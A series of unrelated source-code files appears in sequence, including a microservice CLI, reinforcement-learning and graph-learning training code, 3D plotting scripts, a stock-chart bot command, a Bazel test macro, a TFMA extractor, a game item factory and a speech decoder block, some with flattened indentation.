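    example = {'obs': np.zeros((4, 84, 84), dtype=np.uint8),
               'reward': np.zeros((), dtype=np.float32)}
    buf = buffer_from_example(example, leading_dims=(100, 8))
    assert buf['obs'].shape == (100, 8, 4, 84, 84)
    print(get_leading_dims({'a': np.zeros((5, 3)), 'b': np.zeros((5, 7))}))  # (5,)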
|
64981
|
from copy import deepcopy
from dataclasses import dataclass, asdict
from logging import getLogger, WARNING
import anyconfig
import click
import sys
from pathlib import Path
from typing import List, Tuple
from .command import CwsMultiCommands
from .error import CwsClientError
from ..config import DEFAULT_PROJECT_DIR, DEFAULT_WORKSPACE
from ..utils import import_attr, get_system_info
from ..version import __version__
PROJECT_CONFIG_VERSION = 2
@click.group()
@click.version_option(version=__version__, message=f'%(prog)s %(version)s, {get_system_info()}')
@click.option('-p', '--project-dir', default=DEFAULT_PROJECT_DIR,
help=f"The project directory path (absolute or relative) [default to '{DEFAULT_PROJECT_DIR}'].")
@click.option('-c', '--config-file', help="Configuration file path [path from project dir].")
@click.option('-m', '--module', help="Filename of your microservice python source file.")
@click.option('-s', '--service', help="Microservice variable name in the source file.")
@click.option('-w', '--workspace', default=DEFAULT_WORKSPACE,
help=f"Application stage [default to '{DEFAULT_WORKSPACE}'].")
@click.pass_context
def client(*args, **kwargs):
...
def invoke(ctx):
"""Invokes the command over the service or the declared services in project configuration file."""
try:
args = ctx.args
protected_args = ctx.protected_args
if not protected_args:
sys.stderr.write(str("No command given.\n"))
client.main(['--help'])
sys.exit(1)
command_name = protected_args[0]
# get project options
cws_options = CwsClientOptions(ctx.params)
if not cws_options.services:
sys.stderr.write(str("Nothing to execute as no service defined.\n"))
sys.exit(1)
project_dir = cws_options.project_dir
workspace = cws_options.workspace
# Iterates over the declared services in project configuration file
commands_to_be_executed = CwsMultiCommands()
for module, service in cws_options.services:
ctx.args = list(args)
ctx.protected_args = protected_args
# Get command from the microservice description
handler = cws_options.get_handler(module, service)
handler.deferred_init(workspace)
service_config = cws_options.get_service_config(module, service)
command = service_config.get_command(command_name, handler)
if not command:
raise CwsClientError(f"Undefined command {command_name}.\n")
command_options = service_config.get_command_options(command_name)
# Get user defined options and convert them in right types
client_options, _, cmd_opts = command.make_parser(ctx).parse_args(ctx.args)
for opt_key, opt_value in client_options.items():
cmd_opt = next(x for x in cmd_opts if x.name == opt_key)
client_options[opt_key] = cmd_opt.type(opt_value)
# Adds command and global options
options = {**command_options, **client_options, '_from_cws': True}
if options.get('help', False):
print(command.get_help(ctx))
return
command.make_context(command.name, options)
commands_to_be_executed.append(command, options)
# Executes all commands
for command_class, execution_list in commands_to_be_executed.items():
command_class.multi_execute(project_dir, workspace, execution_list)
except CwsClientError as client_err:
sys.stderr.write(f"Error in command: {client_err.msg}\n")
sys.exit(1)
except Exception as e:
sys.stderr.write(f"Error in command: {str(e)}\n")
sys.exit(1)
client.invoke = invoke
@dataclass
class CwsClientOptions:
"""Client options defined from click command."""
project_dir: str
workspace: str
module: str
service: str
config_file: str
config_file_suffix: str
def __init__(self, params):
self.project_dir = params.get('project_dir')
self.workspace = params.get('workspace')
self.module = params.get('module')
self.service = params.get('service')
self.config_file = params.get('config_file') or 'project'
self.config_file_suffix = params.get('config_file_suffix') or '.cws.yml'
self.project_config = ProjectConfig(self.project_dir, self.config_file, self.config_file_suffix)
@property
def services(self):
"""Returns the list of services defined from the client optons."""
if self.service:
return [(self.module, self.service)]
return self.project_config.all_services(self.module)
def get_handler(self, module, service):
"""Loads microservice handler."""
try:
return import_attr(module, service, cwd=self.project_dir)
except AttributeError as e:
raise CwsClientError(f"Module '{module}' has no microservice {service} : {str(e)}\n")
except ModuleNotFoundError as e:
raise CwsClientError(f"The module '{module}' is not defined in {self.project_dir} : {str(e)}\n")
except Exception as e:
raise CwsClientError(f"Error {e} when loading module '{module}'\n")
def get_service_config(self, module, service, workspace=None):
"""Returns the microserrvice's configuration."""
workspace = workspace or self.workspace
return ServiceConfig(self.project_config, module, service, workspace)
class ProjectConfig:
"""Class for the project configuration file."""
def __init__(self, project_dir, file_name, file_suffix):
self.project_dir = project_dir
self.params = {}
getLogger('anyconfig').setLevel(WARNING)
# Loads project configuration file at project dir then at root if not found
self.params = self._load_config(project_dir, file_name, file_suffix)
if not self.params:
self.params = self._load_config('.', file_name, file_suffix)
# Checks results
if not self.params:
raise CwsClientError(f"Cannot find project file ({file_name + file_suffix}).\n")
if self.params.get('version') != PROJECT_CONFIG_VERSION:
raise CwsClientError(f"Wrong project file version (should be {PROJECT_CONFIG_VERSION}).\n")
def get_service_config(self, module, service, workspace):
return ServiceConfig(self, module, service, workspace)
def all_services(self, module: str = None) -> List[Tuple[str, str]]:
""" Returns the list of (module, microservice) on which the command will be executed."""
services = self.params.get('services', {})
res = []
for s in services:
if 'module' not in s or 'services' not in s:
raise CwsClientError(f"Services wrongly defined.\n")
if module and s['module'] != module:
continue
if 'services' in s:
_module = s['module']
_services = s['services']
if type(_services) is str:
res.append((_module, _services))
else:
for service in _services:
res.append((_module, service))
return res
@property
def all_commands(self):
""" Returns the list of microservices on which the command will be executed."""
return self.params.get('commands', {})
@staticmethod
def _load_config(dir, file_name, file_suffix):
"""Loads the project configuration file."""
project_dir_path = Path(dir)
project_file = project_dir_path / (file_name + file_suffix)
project_secret_file = project_dir_path / (file_name + '.secret' + file_suffix)
return anyconfig.multi_load([project_file, project_secret_file], ac_ignore_missing=True)
@staticmethod
def _get_workspace_options(options, workspace):
"""Returns the option values defined for the specific workspace or globally."""
workspaces = options.pop('workspaces', {})
workspace_options = {k: v for x in workspaces if x.pop('workspace', None) == workspace
for k, v in x.items()}
return {**options, **workspace_options}
def _get_service_options(self, services, service, workspace):
"""Returns the option values defined for the specific service and workspace or globally."""
service_options = {}
for s in services:
if s.pop('service', None) == service:
s.pop('module', None)
service_options.update(self._get_workspace_options(s, workspace))
return {**service_options}
def get_module_options(self, options_list, module, service, workspace):
"""Returns the option values defined for the specific module, service and workspace or globally."""
if type(options_list) is not list:
options_list = [options_list]
service_options = {}
module_options = {}
for options in options_list:
if 'module' not in options or options.pop('module') == module:
services = options.pop('services', {})
module_options.update(self._get_workspace_options(options, workspace))
service_options.update(self._get_service_options(services, service, workspace))
return {**module_options, **service_options}
@dataclass
class ServiceConfig:
project_config: ProjectConfig
module: str
service: str
workspace: str
@property
def client_params(self):
res = asdict(self)
del res['project_config']
res['project_dir'] = self.project_config.project_dir
return res
def get_command(self, cmd_name, ms):
"""Get the command associated to this microservice."""
# Get command already added in handler
for name in ms.commands:
if name == cmd_name:
return ms.commands[name]
# Creates it from project class parameter if not already defined
cmd_class = self._command_class(cmd_name)
if cmd_class:
cmd = cmd_class(ms, name=cmd_name)
# Installs needed commands
for needed in cmd.needed_commands:
self.get_command(needed, ms)
return cmd
def _command_class(self, cmd_name):
"""Loads the command class defined by name."""
cmd_class_name = self.get_command_options(cmd_name).get('class')
if cmd_class_name:
splitted = cmd_class_name.split('.')
return import_attr('.'.join(splitted[:-1]), splitted[-1], cwd=self.project_config.project_dir)
def get_command_options(self, cmd_name):
options = deepcopy(self.project_config.all_commands.get(cmd_name, {}))
module_options = self.project_config.get_module_options(options, self.module, self.service, self.workspace)
return {**self.client_params, **module_options}
def main():
return client()
if __name__ == "__main__":
main()
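
# CLI sketch (hypothetical command name; real commands come from the project
# configuration file and the microservice handlers):
#   cws --project-dir my_project --workspace dev <command>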
|
64987
|
import pickle

import gym.wrappers

from nn.mlp import MLP


def test_cartpole(nn, file):
    global observation
    nn.load(file)
    for _ in range(500):
        env.render()
        action = nn.forward(observation)
        observation, reward, done, info = env.step(round(action.item()))
        if done:
            break


def save_model(nn, filename):
    with open(filename, 'wb') as output:
        pickle.dump(nn, output)


if __name__ == '__main__':
    env = gym.make('CartPole-v1')
    env.seed(123)
    # env = gym.wrappers.Monitor(env, 'cartpole', video_callable=lambda episode_id: True, force=True)
    observation = env.reset()
    nn = MLP(4, 2, 1)
    test_cartpole(nn, '../../../models/cartpole/cartpole12-27-2019_20-29_NN=MLPIndividual_POPSIZE=100_GEN'
                      '=20_PMUTATION_0.4_PCROSSOVER_0.9.npy')
    # save_model(nn, "09-09-2019_17-37_POPSIZE=100_GEN=20_PMUTATION_0.4_PCROSSOVER_0.9.pkl")
    env.close()
|
65014
|
import torch
import random
from tqdm import trange
from layers import Subgraph, Discriminator
from utils import GraphDatasetGenerator
import itertools
import json
from tqdm import tqdm
import numpy as np
import os
class Subgraph_Learning(object):
def __init__(self, args):
super(Subgraph_Learning, self).__init__()
self.args = args
self.dataset_generator = GraphDatasetGenerator(self.args.data)
self.batch_size = self.args.batch_size
self.train_percent = self.args.train_percent
self.validate_percent = self.args.validate_percent
self.D_criterion = torch.nn.BCEWithLogitsLoss()
self.inner_loop = self.args.inner_loop
def _dataset_split(self):
Data_Length = len(self.dataset_generator.graphs)
Training_Length = int(self.train_percent * Data_Length)
Validate_Length = int(self.validate_percent * Data_Length)
Testing_Length = Data_Length - Training_Length - Validate_Length
test_ind = [i for i in range(0, Testing_Length)]
all_ind = [j for j in range(0, Data_Length)]
train_val_ind = list(set(all_ind)-set(test_ind))
train_ind = train_val_ind[0:Training_Length]
validate_ind = train_val_ind[Training_Length:]
self.training_data = [self.dataset_generator.graphs[i] for i in train_ind]
self.validate_data = [self.dataset_generator.graphs[i] for i in validate_ind]
self.testing_data = [self.dataset_generator.graphs[i] for i in test_ind]
def _setup_model(self):
self.model = Subgraph(self.args, self.dataset_generator.number_of_features)
self.discriminator = Discriminator(self.args)
if torch.cuda.is_available():
self.discriminator = Discriminator(self.args).cuda()
self.model = Subgraph(self.args, self.dataset_generator.number_of_features).cuda()
def set_requires_grad(self, net, requires_grad=False):
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
def fit_a_single_model(self):
self._dataset_split()
self._setup_model()
optimizer = torch.optim.Adam(self.model.parameters(),
lr=self.args.learning_rate,
weight_decay=self.args.weight_decay)
Data_Length = len(self.training_data)
Num_split = int(Data_Length / self.batch_size)
for _ in tqdm(range(self.args.epochs)):
for i in range(0, Num_split):
data = self.training_data[int(i*self.batch_size): min(int((i+1)*self.batch_size),Data_Length)]
embeddings, positive, negative, cls_loss, positive_penalty = self.model(data)
for j in range(0, self.inner_loop):
optimizer_local = torch.optim.Adam(self.discriminator.parameters(),
lr=self.args.learning_rate,
weight_decay=self.args.weight_decay)
optimizer_local.zero_grad()
local_loss = - self.MI_Est(self.discriminator, embeddings, positive)
local_loss.backward(retain_graph = True)
optimizer_local.step()
mi_loss = self.MI_Est(self.discriminator, embeddings, positive)
optimizer.zero_grad()
loss = cls_loss + positive_penalty + self.args.mi_weight * mi_loss
loss.backward()
optimizer.step()
print("Loss:%.2f"%(loss))
def MI_Est(self, discriminator, embeddings, positive):
shuffle_embeddings = embeddings[torch.randperm(self.batch_size)]
joint = discriminator(embeddings,positive)
margin = discriminator(shuffle_embeddings,positive)
mi_est = torch.mean(joint) - torch.log(torch.mean(torch.exp(margin)))
return mi_est
def return_index(self,data):
self.model.eval()
ind = self.model.assemble(data)
return ind
def validate(self):
ind = self.return_index(self.validate_data)
count = 0
for data in ind:
save_path = os.path.join(self.args.save_validate, str(count) + '.json')
dump_data = json.dumps(data)
F = open(save_path, 'w')
F.write(dump_data)
F.close()
count += 1
def test(self):
ind = self.return_index(self.testing_data)
count = 0
for data in ind:
save_path = os.path.join(self.args.save_test, str(count) + '.json')
dump_data = json.dumps(data)
F = open(save_path, 'w')
F.write(dump_data)
F.close()
count += 1
def fit(self):
print("\nTraining started.\n")
self.fit_a_single_model()
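# Usage sketch (assumption: `args` exposes the fields read above, e.g. from argparse):
#   from types import SimpleNamespace
#   args = SimpleNamespace(data='input/', batch_size=16, train_percent=0.7,
#                          validate_percent=0.1, inner_loop=150, learning_rate=1e-3,
#                          weight_decay=5e-4, epochs=30, mi_weight=0.1,
#                          save_validate='output/val/', save_test='output/test/')
#   learner = Subgraph_Learning(args)
#   learner.fit(); learner.validate(); learner.test()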
|
65015
|
import numpy as np
from pyray.shapes.twod.paraboloid import *
from pyray.shapes.twod.functional import *
from pyray.rotation import *
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib as mpl
import os
from PIL import Image, ImageDraw
basedir = '.\\Images\\RotatingCube\\'
if os.name == 'posix':
basedir = 'Images/RotatingCube/'
def draw_cubic():
fn = lambda x,y: x**3+y**3
for i in range(20):
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
r = general_rotation(np.array([1,0,0]),np.pi/120*i)
#drawFunctionalXYGridInCircle(draw, r, fn=fn, scale=10.0)
im.save(basedir + 'im' + str(i) + '.png')
def three_d_grid():
fig = plt.figure()
ax = fig.gca(projection='3d')
# Make data.
X = np.arange(-5, 5, 0.25)
Y = np.arange(-5, 5, 0.25)
X, Y = np.meshgrid(X, Y)
R = (X**3 + Y**3)
Z = R
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
# Customize the z axis.
#ax.set_zlim(-1.01, 1.01)
#ax.zaxis.set_major_locator(LinearLocator(10))
#ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
plt.show()
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
theta = np.linspace(0, 2 * np.pi, 100)
for r in np.arange(0.1,1.0,0.1):
#r = 1.0
x = r * np.sin(theta)
y = r * np.cos(theta)
z = x**3+y**3
ax.plot(x, y, z, label='parametric curve')
#ax.legend()
plt.show()
def paraboloid_w_grad(im_ind=0, scale=200, shift=np.array([1000,1000,0]), opacity=60,
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0 * (8 + im_ind/3.0))
j=4
r = rotation(3, 2 * np.pi* j /30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0 * (im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (2048, 2048), "black")
draw = ImageDraw.Draw(im, 'RGBA')
render_scene_4d_axis(draw, r1, 4, scale, shift)
# This is what draws the pink paraboloid.
for z in np.arange(0.001, 3.5, 0.02):
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,
rgba=(255,20,147,50))
xax1=np.array([-100.0,0,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([100.0,0,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
xax1=np.array([0.0,-100,0.0]);xax1=np.dot(r,xax1)*scale+shift
xax2=np.array([0.0,100,0.0]);xax2=np.dot(r,xax2)*scale+shift
draw.line((xax1[0], xax1[1], xax2[0], xax2[1]), fill=(255,255,0), width=4)
#gradients(draw,r)
pt = shift
draw.ellipse((pt[0]-10, pt[1]-10, pt[0]+10, pt[1]+10), fill = (0,255,0))
draw_paraboloid_plane(draw,r,3.3)
draw_paraboloid_plane(draw,r,2.0,extent=1.4)
draw_paraboloid_plane(draw,r,1.0,extent=1.0)
im.save(basepath + 'im' + str(im_ind) + '.png')
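# Invocation sketch: render a frame sequence by sweeping im_ind, e.g.
#   for i in range(10):
#       paraboloid_w_grad(im_ind=i, basepath=basedir)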
def gradients(draw,r):
#for z in [0.3,1.3,2.3,3.3]:
for z in [3.3,2.0,1.0]:
x = np.sqrt(z)
for x in np.arange(-x,x,x/2):
y = np.sqrt(z-x*x)
arrowV1(draw,r,np.array([y,x,z]), np.array([1.5*y,1.5*x,z]), (204,102,255))
if z>3.0:
arrowV1(draw,r,np.array([-y,x,z]), np.array([-1.5*y,1.5*x,z]), (204,102,255))
def draw_paraboloid_plane(draw,r,z=3.3,scale=200,shift=np.array([1000,1000,0]),extent=2):
pt1=np.array([extent,extent,z]);pt1=np.dot(r,pt1)*scale+shift
pt2=np.array([extent,-extent,z]);pt2=np.dot(r,pt2)*scale+shift
pt3=np.array([-extent,-extent,z]);pt3=np.dot(r,pt3)*scale+shift
pt4=np.array([-extent,extent,z]);pt4=np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
point1 = np.array([np.sqrt(z),0,z])
generalized_arc(draw, r, center=np.array([0,0,z]), vec=np.array([0,0,1]),
point=point1, radius=np.sqrt(z), prcnt=1.0,scale=scale,
rgba=(255,20,10,100),width=10)
def plane_w_arrows(im_ind=0, scale=200,\
shift=np.array([824,824,0]),\
basepath='.\\'):
r1 = np.eye(4)
rot = general_rotation(np.array([0,0,1]), np.pi/20.0*(8 + im_ind/3.0))
j=4
r = rotation(3, 2*np.pi*j/30.0)
rr = general_rotation(np.array([0,1,0]), np.pi/20.0*(im_ind/7.0))
r = np.dot(r,rr)
r = np.dot(r, rot)
r1[:3,:3] = r
im = Image.new("RGB", (1648, 1648), "black")
draw = ImageDraw.Draw(im, 'RGBA')
pt1 = 3*np.array([1.0,-1.0,0]); pt2 = 3*np.array([1.0,1.0,0])
z = 1.2**2+1
pt3 = 3*np.array([-1.0,1.0,0]); pt4 = 3*np.array([-1.0,-1.0,0])
pt1 = np.dot(r,pt1)*scale+shift; pt2 = np.dot(r,pt2)*scale+shift
pt3 = np.dot(r,pt3)*scale+shift; pt4 = np.dot(r,pt4)*scale+shift
draw.polygon([(pt1[0], pt1[1]), (pt2[0], pt2[1]), (pt3[0], pt3[1]), (pt4[0], pt4[1])],\
(0,102,255,50))
draw_arrows(draw,r,rgba=(255,250,47),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0, rgba=(73,200,250),shift=shift)
draw_arrows(draw,r,rot_angl=np.pi/2.0+np.pi/3, rgba=(255,20,147),shift=shift)
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,2.5]), shift=shift,rgb=(20,200,25))
arrowV1(draw,r,np.array([0,0,0]), np.array([0,0,-2.5]), shift=shift,rgb=(255,20,25))
im.save(basepath + 'im' + str(im_ind) + '.png')
def draw_arrows(draw,r,rot_angl=np.pi/6.0,rgba=(255,20,147),shift=np.array([1000,1000,0])):
base = np.array([0,0,1.5])
for theta in np.arange(0,np.pi*2,2*np.pi/3):
a = np.array([np.cos(theta),np.sin(theta),0])
rr = general_rotation(a, rot_angl)
arrow1 = np.dot(rr,base)
arrowV1(draw,r,np.array([0,0,0]), arrow1, rgb=rgba,shift=shift)
rgba = rgba+(150,)
generalized_arc(draw, r, center=np.array([0,0,1.5*np.cos(rot_angl)]),
vec=np.array([0,0,1]),
point=1.5*np.array([0,np.sin(rot_angl),np.cos(rot_angl)]),
radius=100, prcnt=1.0,
rgba=rgba,shift=shift)
#####################
## Paraboloid with Lagrange visualized.
im = Image.new("RGB", (2048, 2048), (1, 1, 1))
draw = ImageDraw.Draw(im, 'RGBA')
scale=5.0; ind=0; sep = 24; i = 2.0; base_coeff = 0.02; start_line = -12.0
shift = np.array([1000.0, 1000.0, 0.0])
r1 = np.eye(4); j=24
r = rotation(3, np.pi/30*j)
r1[:3,:3] = r
render_scene_4d_axis(draw, r1, 4)
fn = lambda x, y : paraboloid(x, y, coeff=i*base_coeff, intercept=i)
drawFunctionalXYGrid(draw, r, scale=scale, fn=fn,
extent=60, rgba2=(255,20,147,80),
saperatingPlane=np.array([-1,-1,sep]))
# three_d_parabola expects a second rotation matrix r2; define it above before enabling this call.
# three_d_parabola(draw, r, r2)
im.save(basedir + 'im' + str(0) + '.png')
|
65025
|
import logging
import plotly.graph_objects as go
from bots import imps, load_candle
from openbb_terminal.common.technical_analysis import volume_model
from openbb_terminal.decorators import log_start_end
# pylint: disable=R0913
logger = logging.getLogger(__name__)
@log_start_end(log=logger)
def adosc_command(
ticker="",
interval: int = 15,
past_days: int = 0,
is_open: bool = False,
fast="3",
slow="10",
start="",
end="",
extended_hours: bool = False,
heikin_candles: bool = False,
trendline: bool = False,
news: bool = False,
):
"""Displays chart with chaikin oscillator [Yahoo Finance]"""
# Debug
if imps.DEBUG:
# pylint: disable=logging-too-many-args
logger.debug(
"ta adosc %s %s %s %s %s %s %s %s %s %s %s %s",
ticker,
interval,
past_days,
is_open,
fast,
slow,
start,
end,
extended_hours,
heikin_candles,
trendline,
news,
)
# Check for argument
if ticker == "":
raise Exception("Stock ticker is required")
if not fast.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
fast = int(fast)
if not slow.lstrip("-").isnumeric():
raise Exception("Number has to be an integer")
slow = int(slow)
# Retrieve Data
df_stock, start, end, bar_start = load_candle.stock_data(
ticker=ticker,
interval=interval,
past_days=past_days,
extended_hours=extended_hours,
start=start,
end=end,
heikin_candles=heikin_candles,
)
if df_stock.empty:
raise Exception("No Data Found")
df_ta = df_stock.loc[(df_stock.index >= start) & (df_stock.index < end)]
df_ta = df_ta.join(volume_model.adosc(df_stock, is_open, fast, slow))
# Output Data
if interval != 1440:
df_ta = df_ta.loc[(df_ta.index >= bar_start) & (df_ta.index < end)]
df_ta = df_ta.fillna(0.0)
plot = load_candle.candle_fig(
df_ta,
ticker,
interval,
extended_hours,
news,
bar=bar_start,
int_bar=interval,
trendline=trendline,
rows=2,
cols=1,
shared_xaxes=True,
vertical_spacing=0.05,
row_width=[0.4, 0.7],
specs=[
[{"secondary_y": True}],
[{"secondary_y": False}],
],
)
title = f"<b>{plot['plt_title']} AD Oscillator</b>"
fig = plot["fig"]
fig.add_trace(
go.Scatter(
name="AD Osc [M]",
mode="lines",
x=df_ta.index,
y=df_ta.iloc[:, 6].values
if (not trendline) and (interval != 1440)
else df_ta.iloc[:, 11].values,
line=dict(width=2),
opacity=1,
),
row=2,
col=1,
)
fig.update_layout(
margin=dict(l=0, r=0, t=50, b=20),
template=imps.PLT_TA_STYLE_TEMPLATE,
colorway=imps.PLT_TA_COLORWAY,
title=title,
title_x=0.1,
title_font_size=14,
dragmode="pan",
)
imagefile = "ta_adosc.png"
# Check if interactive settings are enabled
plt_link = ""
if imps.INTERACTIVE:
plt_link = imps.inter_chart(fig, imagefile, callback=False)
imagefile = imps.image_border(imagefile, fig=fig)
return {
"title": f"Stocks: Accumulation/Distribution Oscillator {ticker.upper()}",
"description": plt_link,
"imagefile": imagefile,
}
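# Invocation sketch (assumes the bot's imps/config globals are initialized):
#   out = adosc_command(ticker="AAPL", interval=15, fast="3", slow="10")
#   out["imagefile"]  # rendered chart ready to attach to a bot reply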
|
65047
|
load("//tools:defaults.bzl", "protractor_web_test_suite")
"""
Macro that can be used to define a e2e test in `modules/benchmarks`. Targets created through
this macro differentiate from a "benchmark_test" as they will run on CI and do not run
with `@angular/benchpress`.
"""
def e2e_test(name, server, **kwargs):
protractor_web_test_suite(
name = name,
on_prepare = "@npm//@angular/dev-infra-private/bazel/benchmark/component_benchmark:start-server.js",
server = server,
**kwargs
)
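
# Example BUILD usage (hypothetical target names):
# e2e_test(
#     name = "largetable_e2e",
#     server = "//modules/benchmarks/src/largetable:server",
# )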
|
65076
|
from typing import Dict, Optional, Text, List
import apache_beam as beam
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis import config
from tensorflow_model_analysis import constants
from tensorflow_model_analysis import model_util
from tensorflow_model_analysis import types
from tensorflow_model_analysis.extractors import extractor
from tfx_bsl.tfxio import tensor_adapter
BATCHED_PREDICT_EXTRACTOR_STAGE_NAME = 'ExtractBatchPredictions'
def custom_extractors(eval_config,
eval_shared_model,
tensor_adapter_config
) -> List[tfma.extractors.Extractor]:
return tfma.default_extractors(
eval_config=eval_config,
eval_shared_model=eval_shared_model,
tensor_adapter_config=tensor_adapter_config,
custom_predict_extractor=BatchedPredictExtractor(eval_config,
eval_shared_model,
tensor_adapter_config
))
def BatchedPredictExtractor(
eval_config: config.EvalConfig,
eval_shared_model: types.MaybeMultipleEvalSharedModels,
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> extractor.Extractor:
eval_shared_models = model_util.verify_and_update_eval_shared_models(
eval_shared_model)
return extractor.Extractor(
stage_name=BATCHED_PREDICT_EXTRACTOR_STAGE_NAME,
ptransform=_ExtractBatchedPredictions(
eval_config=eval_config,
eval_shared_models={m.model_name: m for m in eval_shared_models},
tensor_adapter_config=tensor_adapter_config))
@beam.ptransform_fn
@beam.typehints.with_input_types(types.Extracts)
@beam.typehints.with_output_types(types.Extracts)
def _ExtractBatchedPredictions(
extracts: beam.pvalue.PCollection,
eval_config: config.EvalConfig,
eval_shared_models: Dict[Text, types.EvalSharedModel],
tensor_adapter_config: Optional[
tensor_adapter.TensorAdapterConfig] = None,
) -> beam.pvalue.PCollection:
signature_names = {}
for spec in eval_config.model_specs:
model_name = '' if len(eval_config.model_specs) == 1 else spec.name
signature_names[model_name] = [spec.signature_name]
return (extracts
| 'Predict' >> beam.ParDo(
model_util.ModelSignaturesDoFn(
eval_config=eval_config,
eval_shared_models=eval_shared_models,
signature_names={
constants.PREDICTIONS_KEY: signature_names},
prefer_dict_outputs=True,
tensor_adapter_config=tensor_adapter_config)))
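# Wiring sketch (hedged -- exact plumbing depends on the TFMA version in use):
#   extractors = custom_extractors(eval_config, eval_shared_model, tensor_adapter_config)
#   tfma.run_model_analysis(eval_shared_model=eval_shared_model,
#                           eval_config=eval_config,
#                           data_location=data_location,
#                           extractors=extractors)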
|
65107
|
from data.python_templates.items import item_templates
from data.python_templates.material import material_templates
from items.item import Item
class ItemFactory(object):
"""
At first this will only instantiate templates but eventually it should be able
to pump out variations of a template ex: Adjusted to match player level.
"""
def __init__(self):
self.template_instance_count = {}
def build(self, uid):
"""
Builds an item instance from a template using the uid.
:param uid: uid of the template to instantiate.
:return: Built instance from template.
"""
item_instance = item_templates[uid]
if item_instance:
return self._create_instance_of_template(item_instance)
else:
raise Exception("Could not find template for UID " + uid)
def _create_instance_of_template(self, item_template):
instance_id = 0
if item_template.uid in self.template_instance_count:
instance_id = self.template_instance_count[item_template.uid]
self.template_instance_count[item_template.uid] += 1
else:
self.template_instance_count[item_template.uid] = 1
instance_uid = item_template.uid + "_" + str(instance_id)
new_instance = Item(
uid=instance_uid,
name=item_template.name,
description=item_template.description,
display=item_template.display.copy(),
)
item_template.copy_to(new_instance)
return new_instance
def get_material_template_by_uid(self, uid):
return material_templates[uid]
def get_item_template_by_uid(self, uid):
return item_templates[uid]
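# A minimal usage sketch (not part of the original module). "short_sword" is a
# hypothetical template uid; each build() call yields a fresh Item whose uid is
# suffixed with a per-template counter.
#
# factory = ItemFactory()
# sword_a = factory.build("short_sword")  # instance uid: "short_sword_0"
# sword_b = factory.build("short_sword")  # instance uid: "short_sword_1"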
|
65130
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .cond_bn import ConditionalBatchNorm1d
# adopted Generator ResBlock from https://arxiv.org/abs/1909.11646
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels, condition_dim):
super().__init__()
self.cond_bn = nn.ModuleList([
ConditionalBatchNorm1d(in_channels if i==0 else out_channels, condition_dim)
for i in range(4)])
self.leaky_relu = nn.LeakyReLU(0.2)
self.cnn = nn.ModuleList([
nn.Conv1d(in_channels if i==0 else out_channels, out_channels,
kernel_size=3, dilation=2**i, padding=2**i)
for i in range(4)])
self.shortcut = nn.Conv1d(in_channels, out_channels, kernel_size=1)
def forward(self, x, z, mask=None):
identity = x
x = self.cnn[0](self.leaky_relu(self.cond_bn[0](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[1](self.leaky_relu(self.cond_bn[1](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + self.shortcut(identity)
if mask is not None:
x.masked_fill_(mask, 0.0)
identity = x
x = self.cnn[2](self.leaky_relu(self.cond_bn[2](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[3](self.leaky_relu(self.cond_bn[3](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + identity
return x
class VCDecoder(nn.Module):
def __init__(self, hp):
super().__init__()
self.stem = nn.Conv1d(hp.chn.encoder + hp.chn.residual_out, hp.chn.gblock[0], kernel_size=7, padding=3)
self.gblock = nn.ModuleList([
GBlock(in_channels, out_channels, hp.chn.speaker.token)
for in_channels, out_channels in
zip(list(hp.chn.gblock)[:-1], hp.chn.gblock[1:])])
self.final = nn.Conv1d(hp.chn.gblock[-1], hp.audio.n_mel_channels, kernel_size=1)
def forward(self, x, speaker_emb, mask=None):
# x: linguistic features + pitch info.
# [B, chn.encoder + chn.residual_out, T_dec]
x = self.stem(x) # [B, chn.gblock[0], T]
if mask is not None:
x.masked_fill_(mask, 0.0)
for gblock in self.gblock:
x = gblock(x, speaker_emb, mask)
# x: [B, chn.gblock[-1], T]
x = self.final(x) # [B, M, T]
if mask is not None:
x.masked_fill_(mask, 0.0)
return x
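# A minimal shape-check sketch (not part of the original module), assuming
# ConditionalBatchNorm1d(num_features, condition_dim) conditions the
# normalization on z. Each dilated conv (dilation 1/2/4/8 with matching
# padding) preserves the time axis, so GBlock maps [B, C_in, T] -> [B, C_out, T].
if __name__ == "__main__":
    block = GBlock(in_channels=64, out_channels=128, condition_dim=16)
    x = torch.randn(2, 64, 100)  # [B, C_in, T]
    z = torch.randn(2, 16)       # one conditioning vector per sample
    y = block(x, z)
    assert y.shape == (2, 128, 100)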
|
65142
|
import torch
import unittest
import numpy as np
from torch.autograd import Variable
from losses.svm import SmoothTop1SVM, SmoothTopkSVM, MaxTop1SVM, MaxTopkSVM
from losses.functional import Topk_Smooth_SVM
